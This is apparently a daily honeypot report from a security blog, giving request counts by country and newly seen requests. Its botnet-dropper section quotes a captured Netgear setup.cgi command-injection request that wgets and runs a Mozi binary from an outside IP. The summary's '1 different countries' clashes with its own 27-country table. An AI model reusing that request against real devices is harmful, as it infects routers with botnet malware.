Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-08-14

·253 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-08-14
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 4 new requests that have never been observed before (these were added to the monitored request database.).

A total of 437 requests were recorded during the day, originating from 1 different countries, with a peak of 100 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
HKGermany

botnet_dropper_behaviour
#

remote_addrrequest
125.45.67.106GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.45.67.106:51969/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1061\x00\x0E\x08\xDE\xD9\x87!~\xD1\xAC\xC4\x00\x00\x00\x00\x00
1071\x00\x0E8\xDE\xD9\x87!~\xD1\xAC\xC4\x00\x00\x00\x00\x00
1091\x00\x0E\x08\xB9y\x9A\x9E\x83\x06\xB4\xBF\x00\x00\x00\x00\x00
1101\x00\x0E8\xB9y\x9A\x9E\x83\x06\xB4\xBF\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0100US
195GB
288BG
332DE
423NL
523HK
611AU
711FR
89PL
98SC
106SG
114CN
124PT
134LT
143ZA
152MM
162BE
172TR
182KR
191IT
201ES
211KH
221MX
231BR
241RO
251JP
261UA

Related

Report: 2025-08-13
·309 words
Repport Daily
Report: 2025-08-12
·334 words
Repport Daily
Report: 2025-08-11
·304 words
Repport Daily